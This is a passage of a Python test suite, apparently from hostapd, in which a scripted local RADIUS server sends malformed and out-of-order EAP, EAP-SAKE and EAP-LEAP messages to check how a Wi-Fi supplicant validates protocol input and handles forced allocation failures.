            # (RADIUS attribute 79).
            eap = ""
            for p in pkt[79]:
                eap += p
            eap_req = self.eap_handler(self.ctx, eap)
            reply = self.CreateReplyPacket(pkt)
            if eap_req:
                # Fragment the EAP request into <= 253-octet EAP-Message
                # attributes as required by the RADIUS attribute size limit.
                while True:
                    if len(eap_req) > 253:
                        reply.AddAttribute("EAP-Message", eap_req[0:253])
                        eap_req = eap_req[253:]
                    else:
                        reply.AddAttribute("EAP-Message", eap_req)
                        break
            else:
                logger.info("No EAP request available")
            reply.code = pyrad.packet.AccessChallenge

            # Compute Message-Authenticator over the reply with a zeroed
            # placeholder attribute, then swap in the real digest.
            hmac_obj = hmac.new(reply.secret)
            hmac_obj.update(struct.pack("B", reply.code))
            hmac_obj.update(struct.pack("B", reply.id))

            # reply attributes
            reply.AddAttribute("Message-Authenticator",
                               "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
            attrs = reply._PktEncodeAttributes()

            # Length
            flen = 4 + 16 + len(attrs)
            hmac_obj.update(struct.pack(">H", flen))
            hmac_obj.update(pkt.authenticator)
            hmac_obj.update(attrs)
            del reply[80]
            reply.AddAttribute("Message-Authenticator", hmac_obj.digest())

            self.SendReplyPacket(pkt.fd, reply)

        def RunWithStop(self, t_stop, eap_handler):
            """Poll-based main loop that exits once t_stop is set."""
            self._poll = select.poll()
            self._fdmap = {}
            self._PrepareSockets()
            self.t_stop = t_stop
            self.eap_handler = eap_handler
            # Per-connection state shared with the eap_handler callback.
            self.ctx = {}

            while not t_stop.is_set():
                for (fd, event) in self._poll.poll(200):
                    if event == select.POLLIN:
                        try:
                            fdo = self._fdmap[fd]
                            self._ProcessInput(fdo)
                        except pyrad.server.ServerPacketError as err:
                            logger.info("pyrad server dropping packet: " + str(err))
                        except pyrad.packet.PacketError as err:
                            logger.info("pyrad server received invalid packet: " + str(err))
                    else:
                        logger.error("Unexpected event in pyrad server main loop")

    srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
                     authport=18138, acctport=18139)
    srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
                                                     "radius",
                                                     "localhost")
    srv.BindToAddress("")
    t_stop = threading.Event()
    t = threading.Thread(target=run_pyrad_server, args=(srv, t_stop, eap_handler))
    t.start()

    return { 'srv': srv, 'stop': t_stop, 'thread': t }
def stop_radius_server(srv):
    """Signal the RADIUS server thread to stop and wait for it to exit."""
    stop_event = srv['stop']
    server_thread = srv['thread']
    stop_event.set()
    server_thread.join()
def start_ap(ifname):
    """Start a WPA2-Enterprise AP pointed at the local test RADIUS server."""
    cfg = hostapd.wpa2_eap_params(ssid="eap-test")
    # Matches the authport the pyrad test server binds to.
    cfg['auth_server_port'] = "18138"
    return hostapd.add_ap(ifname, cfg)
def test_eap_proto(dev, apdev):
    """EAP protocol tests"""
    check_eap_capa(dev[0], "MD5")

    def eap_handler(ctx, req):
        """Scripted EAP server: each incoming message advances ctx['num'];
        the idx chain below selects the canned response for that step."""
        logger.info("eap_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success - id off by 2")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 1, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success - id off by 3")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] + 2, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('A'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('B'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('C'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: MD5 challenge")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_MD5,
                               1, 0xaa, ord('n'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('D'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 1, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('E'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: EAP-Notification/Request (same id)")
            return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'] - 1,
                               4 + 1 + 1,
                               EAP_TYPE_NOTIFICATION,
                               ord('F'))
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected EAP-Success")
            return struct.pack(">BBH", EAP_CODE_SUCCESS, ctx['id'] - 2, 4)

        # End of script; no further responses.
        return None

    srv = start_radius_server(eap_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # Connection 1: valid MD5 exchange ending in EAP-Success.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP success")
        dev[0].request("REMOVE_NETWORK all")

        # Connection 2: EAP-Success with a mismatching id must be ignored.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=1)
        if ev is not None:
            raise Exception("Unexpected EAP success")
        dev[0].request("REMOVE_NETWORK all")

        # Connection 3: Notification 'A' followed by success.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION A":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP success")
        dev[0].request("REMOVE_NETWORK all")

        # Connection 4: notification before method selection.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION B":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP success")
        dev[0].request("REMOVE_NETWORK all")

        # Connection 5: notifications both before and during the method.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION C":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION D":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-SUCCESS"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP success")
        dev[0].request("REMOVE_NETWORK all")

        # Connection 6: duplicated-id notification and unexpected success
        # leading to EAP failure.
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="MD5", identity="user", password="password",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION E":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-NOTIFICATION"], timeout=10)
        if ev is None:
            raise Exception("Timeout on EAP notification")
        if ev != "<3>CTRL-EVENT-EAP-NOTIFICATION F":
            raise Exception("Unexpected notification contents: " + ev)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-FAILURE"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP failure")
        dev[0].request("REMOVE_NETWORK all")
    finally:
        stop_radius_server(srv)
# EAP-SAKE protocol version and Subtype values.
EAP_SAKE_VERSION = 2

EAP_SAKE_SUBTYPE_CHALLENGE = 1
EAP_SAKE_SUBTYPE_CONFIRM = 2
EAP_SAKE_SUBTYPE_AUTH_REJECT = 3
EAP_SAKE_SUBTYPE_IDENTITY = 4

# EAP-SAKE attribute types (values >= 128 are skippable).
EAP_SAKE_AT_RAND_S = 1
EAP_SAKE_AT_RAND_P = 2
EAP_SAKE_AT_MIC_S = 3
EAP_SAKE_AT_MIC_P = 4
EAP_SAKE_AT_SERVERID = 5
EAP_SAKE_AT_PEERID = 6
EAP_SAKE_AT_SPI_S = 7
EAP_SAKE_AT_SPI_P = 8
EAP_SAKE_AT_ANY_ID_REQ = 9
EAP_SAKE_AT_PERM_ID_REQ = 10
EAP_SAKE_AT_ENCR_DATA = 128
EAP_SAKE_AT_IV = 129
EAP_SAKE_AT_PADDING = 130
EAP_SAKE_AT_NEXT_TMPID = 131
EAP_SAKE_AT_MSK_LIFE = 132
def test_eap_proto_sake(dev, apdev):
    """EAP-SAKE protocol tests"""
    # Module-level flag so sake_handler can signal that the full script
    # of malformed messages has been consumed.
    global eap_proto_sake_test_done
    eap_proto_sake_test_done = False

    def sake_challenge(ctx):
        """Return a well-formed Challenge used to advance past a test step."""
        logger.info("Test: Challenge subtype")
        return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 3 + 18,
                           EAP_TYPE_SAKE,
                           EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                           EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)

    def sake_handler(ctx, req):
        """Scripted EAP-SAKE server: ctx['num'] selects one malformed
        message per step from the idx chain below."""
        logger.info("sake_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Missing payload")
            return struct.pack(">BBHB", EAP_CODE_REQUEST, ctx['id'], 4 + 1,
                               EAP_TYPE_SAKE)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4, 0)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype (different session id)")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 1, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_PERM_ID_REQ, 4, 0)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with too short attribute")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 2)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with truncated attribute")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with too short attribute header")
            payload = struct.pack("B", EAP_SAKE_AT_ANY_ID_REQ)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with AT_IV but not AT_ENCR_DATA")
            payload = struct.pack("BB", EAP_SAKE_AT_IV, 2)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with skippable and non-skippable unknown attribute")
            payload = struct.pack("BBBB", 255, 2, 127, 2)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype: AT_RAND_P with invalid payload length")
            payload = struct.pack("BB", EAP_SAKE_AT_RAND_P, 2)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype: AT_MIC_P with invalid payload length")
            payload = struct.pack("BB", EAP_SAKE_AT_MIC_P, 2)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype: AT_PERM_ID_REQ with invalid payload length")
            payload = struct.pack("BBBBBBBBBBBBBB",
                                  EAP_SAKE_AT_SPI_S, 2,
                                  EAP_SAKE_AT_SPI_P, 2,
                                  EAP_SAKE_AT_ENCR_DATA, 2,
                                  EAP_SAKE_AT_NEXT_TMPID, 2,
                                  EAP_SAKE_AT_PERM_ID_REQ, 4, 0, 0,
                                  EAP_SAKE_AT_PERM_ID_REQ, 2)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype: AT_PADDING")
            payload = struct.pack("BBBBBB",
                                  EAP_SAKE_AT_PADDING, 3, 0,
                                  EAP_SAKE_AT_PADDING, 3, 1)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype: AT_MSK_LIFE")
            payload = struct.pack(">BBLBBH",
                                  EAP_SAKE_AT_MSK_LIFE, 6, 0,
                                  EAP_SAKE_AT_MSK_LIFE, 4, 0)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Identity subtype with invalid attribute length")
            payload = struct.pack("BB", EAP_SAKE_AT_ANY_ID_REQ, 0)
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + len(payload),
                               EAP_TYPE_SAKE, EAP_SAKE_VERSION, 0,
                               EAP_SAKE_SUBTYPE_IDENTITY) + payload

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unknown subtype")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, 123)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Challenge subtype with too short AT_RAND_S")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                               EAP_SAKE_AT_RAND_S, 2)

        idx += 1
        if ctx['num'] == idx:
            return sake_challenge(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Identity subtype")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4, 0)

        idx += 1
        if ctx['num'] == idx:
            return sake_challenge(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Challenge subtype")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CHALLENGE,
                               EAP_SAKE_AT_RAND_S, 18, 0, 0, 0, 0)

        idx += 1
        if ctx['num'] == idx:
            return sake_challenge(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Confirm subtype without any attributes")
            return struct.pack(">BBHBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM)

        idx += 1
        if ctx['num'] == idx:
            return sake_challenge(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Confirm subtype with too short AT_MIC_S")
            return struct.pack(">BBHBBBBBB", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 2,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 2)

        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Unexpected Confirm subtype")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)

        idx += 1
        if ctx['num'] == idx:
            return sake_challenge(ctx)
        idx += 1
        if ctx['num'] == idx:
            logger.info("Test: Confirm subtype with incorrect AT_MIC_S")
            return struct.pack(">BBHBBBBBBLLLL", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 18,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_CONFIRM,
                               EAP_SAKE_AT_MIC_S, 18, 0, 0, 0, 0)

        # Script exhausted: answer any further exchange with a valid
        # challenge and report EAP-Failure once to end the run.
        global eap_proto_sake_test_done
        if eap_proto_sake_test_done:
            return sake_challenge(ctx)

        logger.info("No more test responses available - test case completed")
        eap_proto_sake_test_done = True
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)

    srv = start_radius_server(sake_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # Keep reconnecting until the handler reports the script finished.
        while not eap_proto_sake_test_done:
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SAKE", identity="sake user",
                           password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            time.sleep(0.1)
            dev[0].request("REMOVE_NETWORK all")

        logger.info("Too short password")
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SAKE", identity="sake user",
                       password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcd",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        time.sleep(0.1)
    finally:
        stop_radius_server(srv)
def test_eap_proto_sake_errors(dev, apdev):
    """EAP-SAKE local error cases"""
    check_eap_capa(dev[0], "SAKE")
    params = hostapd.wpa2_eap_params(ssid="eap-test")
    hapd = hostapd.add_ap(apdev[0]['ifname'], params)

    # Force memory-allocation failures during method initialization.
    for count in (1, 2):
        with alloc_fail(dev[0], count, "eap_sake_init"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SAKE", identity="sake user",
                           password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["EAP: Failed to initialize EAP method"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()

    # Allocation failures at various points within the SAKE exchange.
    alloc_tests = [
        (1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_challenge"),
        (1, "=eap_sake_process_challenge"),
        (1, "eap_sake_compute_mic;eap_sake_process_challenge"),
        (1, "eap_sake_build_msg;eap_sake_process_confirm"),
        (2, "eap_sake_compute_mic;eap_sake_process_confirm"),
        (1, "eap_sake_getKey"),
        (1, "eap_sake_get_emsk"),
        (1, "eap_sake_get_session_id"),
    ]
    for count, func in alloc_tests:
        with alloc_fail(dev[0], count, func):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SAKE", identity="sake user",
                           password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                           erp="1",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            wait_fail_trigger(dev[0], "GET_ALLOC_FAIL")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()

    # Random-number generation failure while processing the Challenge.
    with fail_test(dev[0], 1, "os_get_random;eap_sake_process_challenge"):
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="SAKE", identity="sake user",
                       password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"], timeout=15)
        if ev is None:
            raise Exception("Timeout on EAP start")
        wait_fail_trigger(dev[0], "GET_FAIL")
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
def test_eap_proto_sake_errors2(dev, apdev):
    """EAP-SAKE protocol tests (2)"""
    def sake_handler(ctx, req):
        logger.info("sake_handler - RX " + req.encode("hex"))
        # Count received messages and advance the EAP identifier for each
        # scripted response.
        ctx['num'] = ctx.get('num', 0) + 1
        ctx['id'] = (ctx.get('id', 1) + 1) % 256

        if ctx['num'] == 1:
            logger.info("Test: Identity subtype")
            return struct.pack(">BBHBBBBBBH", EAP_CODE_REQUEST, ctx['id'],
                               4 + 1 + 3 + 4,
                               EAP_TYPE_SAKE,
                               EAP_SAKE_VERSION, 0, EAP_SAKE_SUBTYPE_IDENTITY,
                               EAP_SAKE_AT_ANY_ID_REQ, 4, 0)

    srv = start_radius_server(sake_handler)

    try:
        hapd = start_ap(apdev[0]['ifname'])

        # Allocation failure while building the Identity response.
        with alloc_fail(dev[0], 1, "eap_msg_alloc;eap_sake_build_msg;eap_sake_process_identity"):
            dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                           eap="SAKE", identity="sake user",
                           password_hex="0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef",
                           wait_connect=False)
            ev = dev[0].wait_event(["CTRL-EVENT-EAP-PROPOSED-METHOD"],
                                   timeout=15)
            if ev is None:
                raise Exception("Timeout on EAP start")
            dev[0].request("REMOVE_NETWORK all")
            dev[0].wait_disconnected()
    finally:
        stop_radius_server(srv)
def test_eap_proto_leap(dev, apdev):
    """EAP-LEAP protocol tests

    A scripted RADIUS server walks the peer through a sequence of malformed
    and unexpected EAP-LEAP messages (requests and responses) to exercise
    the peer's protocol validation paths.

    Fixes: the log messages for the challenge-value Response steps
    misspelled "challenge" as "challange"; the repeated valid-challenge
    frame is built by a single helper (same pattern as sake_challenge()).
    """
    check_eap_capa(dev[0], "LEAP")
    def leap_challenge(ctx):
        # Well-formed LEAP request with an 8-octet all-zero challenge.
        logger.info("Test: Valid challenge")
        return struct.pack(">BBHBBBBLL", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 3 + 8,
                           EAP_TYPE_LEAP,
                           1, 0, 8, 0, 0)
    def leap_handler(ctx, req):
        logger.info("leap_handler - RX " + req.encode("hex"))
        # Message counter and EAP identifier bookkeeping for the scripted
        # sequence.
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] += 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        if ctx['num'] == 1:
